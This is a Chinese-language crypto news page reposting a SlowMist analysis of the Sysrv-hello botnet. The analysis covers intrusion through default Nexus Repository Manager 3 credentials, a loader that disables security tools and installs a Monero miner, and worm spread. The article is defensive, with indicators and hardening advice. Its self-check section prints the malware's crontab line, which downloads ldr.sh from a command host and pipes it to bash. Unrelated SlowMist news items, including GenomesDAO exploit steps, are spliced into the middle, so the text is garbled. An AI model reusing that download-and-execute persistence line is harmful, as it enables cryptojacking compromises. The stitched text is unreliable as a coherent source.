STA:慢霧：技術拆解 Sysrv-hello 僵尸網絡入侵原理_Rasta Finance

攻擊路徑

Sysrv-hello僵尸網絡對云上NexusRepositoryManager3存在默認帳號密碼的服務器進行攻擊，Maven私服部署會用到NexusRepositoryManager3，由于Maven是個流行服務，所以也給了Sysrv-hello僵尸網絡的大范圍感染機會。

當NexusRepositoryManager3服務對外網開放且存在默認賬號密碼時，Sysrv-hello就可以直接掃描入侵，利用NexusRepositoryManager3的Tasks功能模塊直接運行惡意腳本達到入侵服務器的目的。

慢霧：針對傳言火幣信息泄漏事件不涉及用戶賬戶與資金安全 請保持客觀冷靜對待:據官方消息，慢霧注意到近日有白帽子公開了此前一個火幣已經處理完畢的過往漏洞信息。經慢霧與火幣官方確認，火幣本著負責任披露信息的策略，對本次事件做以下說明：本次事件是小范圍內（4000人）的用戶聯絡信息泄露，信息種類不涉及敏感信息，不涉及用戶賬戶與資金安全。事件發生于2021年6月22日日本站測試環境S3桶相關人員不規范操作導致，相關用戶信息于2022年10月8日已經完全隔離，日本站與火幣全球站無關。本次事件由白帽團隊發現后，火幣安全團隊2023年6月21日（10天前）已第一時間進行處理，立即關閉相關文件訪問權限，當前漏洞已修復，所有相關用戶信息已經刪除。感謝白帽團隊對于火幣安全做出的貢獻。最后提醒請大家冷靜對待，切勿傳謠。[2023/7/1 22:12:01]

入侵到服務器后會自動下載執行ldr.sh文件，該文件主要功能：1.禁用Linux服務器防火墻(ufw)及清空iptables2.刪除aliyun、yunjing等主機安全軟件3.禁用apparmor、selinux、watchdog等安全機制4.刪除其他競品5.下載門羅幣挖礦程序進行挖礦，文件與進程名為network016.下載第二個木馬sysrv進行更高級操作7.在crontab里加上尾巴

慢霧：GenomesDAO被黑簡析:據慢霧區hacktivist消息，MATIC上@GenomesDAO項目遭受黑客攻擊，導致其LPSTAKING合約中資金被非預期的取出。慢霧安全團隊進行分析有以下原因：

1.由于GenomesDAO的LPSTAKING合約的initialized函數公開可調用且無權限與不可能重復初始化限制，攻擊者利用initialized函數將合約的stakingToken設置為攻擊者創建的虛假LP代幣。

2.隨后攻擊者通過stake函數進行虛假LP代幣的抵押操作，以獲得大量的LPSTAKING抵押憑證。

3.獲得憑證后再次通過initialized函數將合約的stakingToken設置為原先真是的LP代幣，隨后通過withdraw函數銷毀LPSTAKING憑證獲取合約中真實的LP抵押物。

4.最后將LP發送至DEX中移除流動性獲利。

本次事件是因為GenomesDAO的LPSTAKING合約可被任意重復初始化設置關鍵參數而導致合約中的抵押物被惡意耗盡。[2022/8/7 12:07:06]

第二個木馬sysrv的主要功能：1.確保門羅幣挖礦程序network01正常運行2.進行蠕蟲傳播，隨機掃描其他IP服務，同樣進行NexusRepositoryManager3漏洞利用，同時也會嘗試入侵MySQL、Tomcat、WebLogic等服務

慢霧：Nomad事件中仍有超過9500萬美元被盜資金留在3個地址中:8月2日消息，慢霧監測顯示，Nomad攻擊事件中仍有超過9500萬美元的被盜資金留在3個地址中。其中0xB5C55f76f90Cc528B2609109Ca14d8d84593590E中仍有1084枚ETH、120萬枚DAI、103枚WBTC等約800萬美元的加密資產，該地址也負責將1萬枚WETH轉移到另一地址以及將其他USDC轉移；第二個地址0x56D8B635A7C88Fd1104D23d632AF40c1C3Aac4e3目前仍有1.28萬枚ETH、1.02萬枚WETH、80萬DAI等約4700萬美元的加密資產；第三個地址0xBF293D5138a2a1BA407B43672643434C43827179在收到3866.6萬USDC后兌換為了DAI，目前有約3970萬美元的加密資產。

目前慢霧經過梳理后，無法將地址3與其他兩個地址連接起來，但這些攻擊具有相同的模式。[2022/8/2 2:53:04]

自查方法

進程：network01sysrv

文件：/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab：echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口：52013

存在以上這些，停止備份樣本后刪除。

加固建議

刪除NexusRepositoryManager3Tasks里的惡意代碼NexusRepositoryManager3嚴禁外網訪問，嚴禁默認賬號密碼NexusRepositoryManager3升級為最新版本被入侵服務器備份重要數據后，重配置或重做檢查被入侵服務器是否存在直接訪問生產網其他服務的能力，存在則在生產網其他服務所在的服務器上進一步分析是否有異常免責聲明：作為區塊鏈信息平臺，本站所發布文章僅代表作者個人觀點，與鏈聞ChainNews立場無關。文章內的信息、意見等均僅供參考，并非作為或被視為實際投資建議。

本文來源于非小號媒體平臺：

慢霧科技

現已在非小號資訊平臺發布68篇作品，

非小號開放平臺歡迎幣圈作者入駐

入駐指南：

/apply_guide/

本文網址：

/news/9606255.html

免責聲明：

1.資訊內容不構成投資建議，投資者應獨立決策并自行承擔風險

2.本文版權歸屬原作所有，僅代表作者本人觀點，不代表非小號的觀點或立場

上一篇：

深入解析MakeDao在新周期里的機遇和風險

Tags：REPNexusMANSTArep幣下架FinNexusMANDOXRasta Finance

以太坊交易所